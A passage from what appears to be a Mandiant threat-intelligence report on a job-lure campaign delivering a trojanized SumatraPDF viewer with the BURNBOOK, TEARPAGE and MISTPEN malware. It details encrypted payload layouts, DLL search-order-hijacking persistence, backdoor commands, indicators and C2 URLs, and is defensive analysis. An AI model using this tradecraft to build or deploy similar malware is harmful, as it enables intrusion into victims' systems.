hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">File</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">BAE_VICE President of Business Development.pdf</strong></p> <p><span style="vertical-align: baseline;">(MD5: 28a75771ebdb96d9b49c9369918ca581)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">libmupdf.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: 57e8a7ef21e7586d008d4116d70062a6)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A trojanized dynamic-link library (DLL) file required by SumatraPDF.exe, tracked as BURNBOOK. 
This file is a dropper for an embedded DLL, "wtsapi32.dll", which is tracked as TEARPAGE</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">and</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">used to execute the MISTPEN backdoor after the system is rebooted.</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PdfFilter.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: cefc7b6e95f5a985b7319021441ae4e7)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate DLL file required by SumatraPDF.exe</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">PdfPreview.dll</strong></p> <p><span style="vertical-align: baseline;">(MD5: 2505610c490d24a98da730100175f262)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate DLL file required by SumatraPDF.exe</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">SumatraPDF.exe</strong></p> <p><span style="vertical-align: baseline;">(MD5: 91841e006225ac500de7630740a21d91)</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">A legitimate open-source PDF viewer application component, version 3.3.3</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div style="color: #5f6368; overflow: auto hidden; width: 100%; 
text-align: center;"><span style="vertical-align: baseline; font-style: italic; color: #5f6368; display: block; font-size: 16px; margin-top: 8px; width: 100%;">Table 1: Files in ZIP archive received through WhatsApp chat</span></div> </div> </div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">Based on the surrounding context, the user was likely instructed to open the PDF file with the enclosed trojanized PDF viewer program based on the open-source project SumatraPDF. As previously stated, this technique did not employ a vulnerability in the original SumatraPDF source code.</span></p> <p><span style="vertical-align: baseline;">SumatraPDF is an open-source document viewer that can display many document formats, including PDF, XPS, and CHM. Its </span><a href="https://github.com/sumatrapdfreader/sumatrapdf" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">source code</span></a><span style="vertical-align: baseline;"> is publicly available. </span></p> <p><span style="vertical-align: baseline;">When accessed this way, the DLL files are loaded by the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> executable, including the trojanized </span><code style="vertical-align: baseline;">libmupdf.dll</code><span style="vertical-align: baseline;"> file, which represents the first stage of the infection chain. This file is responsible for decrypting the contents of </span><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;">, so that the job description document can be displayed, and for loading the payload named MISTPEN into memory. 
Mandiant found that later versions (after 3.4.3) of SumatraPDF implement countermeasures to prevent modified versions of this DLL from being loaded.</span></p> <p><span style="vertical-align: baseline;">MISTPEN is a trojanized version of a legitimate Notepad++ plugin, </span><code style="vertical-align: baseline;">binhex.dll</code><span style="vertical-align: baseline;">, which contains a backdoor.</span></p> <p><code style="vertical-align: baseline;">Libmupdf.dll</code><span style="vertical-align: baseline;"> also writes the encrypted backdoor to disk into a new file named </span><code style="vertical-align: baseline;">thumbs.ini</code><span style="vertical-align: baseline;"> and creates a scheduled task named </span><code style="vertical-align: baseline;">Sumatra Launcher</code><span style="vertical-align: baseline;"> to execute the backdoor daily using the legitimate Windows binary </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;">,</span><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">which loads the </span><code style="vertical-align: baseline;">wtsapi32.dll</code><strong style="vertical-align: baseline;"> </strong><span style="vertical-align: baseline;">file through DLL search-order hijacking.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/original_images/mistpen-fig3a.jpeg" alt="Infection lifecycle diagram"> </a> <figcaption class="article-image__caption "><p data-block-key="fkgmh">Figure 3: Infection lifecycle diagram</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Analysis of BURNBOOK (libmupdf.dll)</span></h2> <p><span style="vertical-align: 
baseline;">BURNBOOK is a launcher written in C/C++ that is capable of executing an encrypted payload stored in a file and writing it to disk. </span></p> <p><span style="vertical-align: baseline;">This file is a modified version of a legitimate DLL file used by the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> binary. The DLL contains malicious code that is triggered when the user opens the PDF lure (</span><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;">) using the provided </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> file.</span></p> <p style="text-align: justify;"><code style="vertical-align: baseline;">BAE_Vice President of Business Development.pdf</code><span style="vertical-align: baseline;"> has the following structure and contents:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 
100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">File Offset</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Value Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x0 - 0x7</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Offset used to determine the end of the encrypted PDF file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x8 - 
0x27</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 key</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x28 - 0x33</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 nonce</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x34 - [PDF Offset]</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted PDF file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x4DF1D - 0x4DF24</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Size of the encrypted DLL</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x4DF25 - EOF</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted DLL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: PDF lure structure and contents</span></div></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 1: Initial Setup and 
Decryption</span></h3> <p><span style="vertical-align: baseline;">The sample commences by reading the first 8 bytes of the PDF file, storing this value as a marker to determine the end of the embedded encrypted PDF file. The next 32 bytes (key) and 12 bytes (nonce) are read from the file and used to initialize a ChaCha20 cipher. The cipher's initial state is stored in memory. </span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig4.max-1000x1000.png" alt="The ChaCha20 cipher is initialized"> </a> <figcaption class="article-image__caption "><p data-block-key="mzocw">Figure 4: The ChaCha20 cipher is initialized</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The remaining bytes (starting from offset 0x34 and looping until the PDF offset is reached) are decrypted in chunks of 0x1000 (4096) bytes using the ChaCha20 cipher. 
The decrypted data, representing a PDF file, is written to the system's temporary folder and will be displayed by the PDF viewer if the sample passes a network connectivity check to </span><code style="vertical-align: baseline;">google[.]com</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig5.max-1000x1000.png" alt="The embedded PDF file is decrypted using the cipher"> </a> <figcaption class="article-image__caption "><p data-block-key="wem5x">Figure 5: The embedded PDF file is decrypted using the cipher</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 2: Backdoor Extraction and Execution</span></h3> <p><span style="vertical-align: baseline;">Upon reaching the offset retrieved in the first phase, the function reads 8 bytes signifying the size of the encrypted backdoor DLL, which is subsequently read from the file. 
</span><span style="vertical-align: baseline;">The same ChaCha20 cipher (without resetting) is used to decrypt the backdoor DLL, which is then reflectively loaded into the memory space of </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> and executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig6.max-1000x1000.png" alt="The backdoor DLL (MISTPEN) is decrypted"> </a> <figcaption class="article-image__caption "><p data-block-key="wem5x">Figure 6: The backdoor DLL (MISTPEN) is decrypted</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Phase 3: Persistence and Re-Encryption</span></h3> <p><span style="vertical-align: baseline;">The sample extracts </span><code style="vertical-align: baseline;">wtsapi32.dll</code><span style="vertical-align: baseline;"> from its resource section and copies </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;"> from the System32 directory, placing both files in the </span><code style="vertical-align: baseline;">%APPDATA%\Microsoft\BDE UI Launcher</code><span style="vertical-align: baseline;"> directory for persistence. Following this, the ChaCha20 cipher is reset</span><span style="vertical-align: baseline;">, with the original key and nonce being reused to re-encrypt the in-memory DLL containing the backdoor code.</span><span style="vertical-align: baseline;"> The re-encrypted data, along with the key and nonce, are written to </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;">. 
These steps ensure that </span><code style="vertical-align: baseline;">Thumbs.ini</code><span style="vertical-align: baseline;"> and the </span><span style="vertical-align: baseline;">PDF</span><span style="vertical-align: baseline;"> file both contain the same encrypted DLL but with different ciphertexts.</span></p> <p><span style="vertical-align: baseline;">Finally, the sample creates a scheduled task named </span><code style="vertical-align: baseline;">Sumatra Launcher</code><span style="vertical-align: baseline;">,</span><span style="vertical-align: baseline;"> which executes </span><code style="vertical-align: baseline;">%APPDATA%\Microsoft\BDE UI Launcher\BdeUISrv.exe</code><span style="vertical-align: baseline;"> daily when the user logs in. This is further discussed under the analysis of TEARPAGE.</span></p> <h2><span style="vertical-align: baseline;">Analysis of MISTPEN</span></h2> <p><span style="vertical-align: baseline;">MISTPEN is a lightweight backdoor written in C whose main functionality is to download and execute Portable Executable (PE) files.</span></p> <p><span style="vertical-align: baseline;">The backdoor is a modification of the open-source </span><a href="https://github.com/skycc86/npp_binhex_plugin" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Notepad++ binhex plugin</span></a><span style="vertical-align: baseline;"> v2.0.0.1 where the creation of a thread that executes the malicious code has been added to the </span><code style="vertical-align: baseline;">DllMain</code><span style="vertical-align: baseline;"> function.</span></p> <p><span style="vertical-align: baseline;">MISTPEN decrypts a token using AES with the key </span><code style="vertical-align: baseline;">EF 0D 4E A6 D8 B8 E8 73 DF 17 5C 0B 51 F6 3B 33</code><span style="vertical-align: baseline;">, which is then used to access a Microsoft API endpoint in the following request:</span></p></div> <div 
class="block-paragraph_advanced"><pre class="language-plain"><code>Request type: POST
Request URI: https://login.microsoftonline.com/common/oauth2/v2.0/token"
Body: grant_type=refresh_token
&amp;refresh_token=0.AScAuGeUx8-5OkufugCaUtV EuwXupyYCVnZNp7rq6Le2eUEnAME.AgABAwEAAADnfolhJpSnRYB1SVj-Hgd8 AgDs_wUA9P_z3EI-It1YbdHPtZaMoegHpfKNHgO9rjjC9plVmHfYhva9utOdkzbp o-p4m5uoLzuQu9kJmCqXpdDteicUF5Fd7XfcVBpe5Vu1TOhxQoP-k1HJmiLRg GcdzWMa3aYVzdfnNsAlV8n-061gnUDKNxHYL4xTz1jymmhRGzZ1KOOiJLs7e j0A8fMNSqvTwp_UF7upYw5yI81UTRsBN9hbpGpLnMb_WIOMvX-Bcm3CtCHjf Lzij1n... &lt;REDACTED&gt;</code></pre></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps[:]//login[.]microsoftonline[.]com/common/oauth2/v2.0/token</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps[:]//graph[.]microsoft[.]com/v1.0/me/drive/root:/path/upload/hello/</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/root:/path/upload/world/</code></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://graph.microsoft[.]com/v1.0/me/drive/items/</code></p> </li> </ul> <p><span style="vertical-align: baseline;">The backdoor reads configuration data from the file <code>setup.bin</code> if it exists within the same directory. The configuration data includes the sleep time and an ID. 
The backdoor sleeps for the configured time and sends the message "</span><code style="vertical-align: baseline;">Hi,I m just woke up!</code><span style="vertical-align: baseline;">" to its command-and-control (C2 or C&amp;C) server.</span></p> <p><span style="vertical-align: baseline;">Otherwise, the backdoor generates a random hexadecimal ID and sends the time and timezone to its C2. If the backdoor fails to get the time information, the backdoor sends the message "</span><code style="vertical-align: baseline;">Hi,I am New</code><span style="vertical-align: baseline;">" to its C2 instead.</span></p> <p><span style="vertical-align: baseline;">On the infected host, Mandiant observed a suspicious network connection from the </span><code style="vertical-align: baseline;">SumatraPDF.exe</code><span style="vertical-align: baseline;"> process towards a compromised SharePoint domain belonging to a university. As this connection occurred after MISTPEN execution, Mandiant assesses that the SharePoint URL was part of the in-memory execution of payloads sent to the backdoor after establishing communication with the C2, leaving no other traces on disk.</span></p> <p><span style="vertical-align: baseline;">The backdoor includes code to support more than one token, randomly selecting the one to use.</span></p> <h3><span style="vertical-align: baseline;">Backdoor Commands</span></h3> <p><span style="vertical-align: baseline;">The backdoor supports the following commands:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">d</code><span style="vertical-align: baseline;">: The backdoor parses, loads into memory, and executes the received PE payload. 
The backdoor sends a message to its C2 that contains the result from the executed code or the string: "</span><code style="vertical-align: baseline;">Loaded at &lt;p&gt;</code><span style="vertical-align: baseline;">" where </span><code style="vertical-align: baseline;">&lt;p&gt;</code><span style="vertical-align: baseline;"> is a hexadecimal address.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">e</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">DEAD</code><span style="vertical-align: baseline;">" to its C2 and terminates the process.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">f</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">Sleep Success</code><span style="vertical-align: baseline;">" to its C2, sleeps for the specified time, and sends the message "</span><code style="vertical-align: baseline;">Hi,I m just woke up!</code><span style="vertical-align: baseline;">" to its C2.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">g</code><span style="vertical-align: baseline;">: The backdoor sends the message "</span><code style="vertical-align: baseline;">Hiber Success</code><span style="vertical-align: baseline;">" to its C2, updates the sleep time in the configuration with the received time, writes its configuration to </span><code style="vertical-align: baseline;">setup.bin</code><span style="vertical-align: baseline;">, and sleeps for the configured time.</span></p> </li> </ul> <h2><span style="vertical-align: baseline;">Analysis of TEARPAGE (wtsapi32.dll)</span></h2> <p><span 
style="vertical-align: baseline;">TEARPAGE, a loader embedded within the resource section of BURNBOOK, is loaded through DLL search order hijacking by the legitimate </span><code style="vertical-align: baseline;">BdeUISrv.exe</code><span style="vertical-align: baseline;"> binary copied by the malware from its original location to the directory containing the loader. TEARPAGE</span><span style="vertical-align: baseline;"> </span><span style="vertical-align: baseline;">decrypts an encrypted blob contained in the file </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;">. Table 3 describes the structure of this file:</span></p></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; 
overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">File Offset</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p style="text-align: center;"><strong style="vertical-align: baseline;">Value Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x0 - 0x1F</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 key</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x20 - 0x2B</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ChaCha20 nonce</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">0x2C - EOF</span></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Encrypted backdoor DLL</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div align="left" style="text-align: center;"><span style="color: #5f6368; 
display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Table 3: </span><code style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</code><span style="vertical-align: baseline;"> structure</span></span></div></div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The sample retrieves the initial 32 bytes and the subsequent 12 bytes from </span><code><span style="vertical-align: baseline;">%APPDATA%\Thumbs.ini</span></code><span style="vertical-align: baseline;">, using these values as the key and nonce respectively to initialize a ChaCha20 cipher. This cipher is then used to decrypt the remaining contents of the file.</span></p> <p><span style="vertical-align: baseline;">The resulting decrypted output is the MISTPEN backdoor, which is subsequently reflectively loaded into the memory space of </span><code><span style="vertical-align: baseline;">BdeUISrv.exe</span></code><span style="vertical-align: baseline;"> and executed.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig7.max-1000x1000.png" alt="A pseudocode representation of the malicious code in wtsapi32.dll"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 7: A pseudocode representation of the malicious code in wtsapi32.dll</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Sample Comparison</span></h2> <p><span style="vertical-align: baseline;">Through open-source investigation, Mandiant identified a similar malicious archive containing the same </span><code><span style="vertical-align: baseline;">SumatraPDF.exe</span></code><span 
style="vertical-align: baseline;"> binary; however, there are a few key differences in the BURNBOOK and MISTPEN samples as compared to specimens analyzed earlier in the post. Moreover, this second archive was created prior to the one discussed throughout this blog post. By highlighting the noticeable differences, we can clearly see an evolution in malware capabilities and stealthiness.</span></p> <h3><span style="vertical-align: baseline;">Missing Internet Connectivity Check in BURNBOOK</span></h3> <p><span style="vertical-align: baseline;">The BURNBOOK sample we analyzed includes a network connectivity check that prevents the trojanized reader from displaying the decrypted PDF lure if it cannot reach </span><code><span style="vertical-align: baseline;">google[.]com</span></code><span style="vertical-align: baseline;">. This feature is not present in the earlier sample.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig8a.max-1000x1000.png" alt="BURNBOOK earlier version"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 8: BURNBOOK earlier version</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/mistpen-fig9.max-1000x1000.png" alt="BURNBOOK later version with connection check"> </a> <figcaption class="article-image__caption "><p data-block-key="r6d1q">Figure 9: BURNBOOK later version with connection check</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: 
baseline;">Missing Command </span><span style="font-style: italic; vertical-align: baseline;">g</span><span style="vertical-align: baseline;"> in MISTPEN</span></h3> <p><span style="vertical-align: baseline;">The MISTPEN sample we analyzed supports the </span><span style="vertical-align: baseline;">g</span><span style="vertical-align: baseline;"> command, which instructs the backdoor to save its configuration to a file named </span><span style="vertical-align: baseline;">setup.bin</span><span style="vertical-align: baseline;">. This file is also read by the backdoor when it first executes and thus allows MISTPEN to make its configuration persistent on the host. The earlier sample does not support this command, does not reference </span><span style="vertical-align: baseline;">setup.bin</span><span style="vertical-align: baseline;">, and does not save its configuration to disk.</span></p> <h3><span style="vertical-align: baseline;">Different C2 Infrastructure</span></h3> <p><span style="vertical-align: baseline;">The MISTPEN sample delivered by the earlier malicious archive does not communicate using Microsoft Graph and instead employs a set of HTTPS URLs consisting of compromised WordPress websites belonging to small businesses from across the world:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://bmtpakistan[.]com/solution/wp-content/plugins/one-click-demo-import/assets/asset.php</code><span style="vertical-align: baseline;"> — Construction company in Karachi, Pakistan</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">hxxps://cmasedu[.]com/wp-content/plugins/kirki/inc/script.php</code><span style="vertical-align: baseline;"> — Education service company based in Riyadh, Saudi Arabia</span></p> </li> <li aria-level="1" style="list-style-type: disc; 
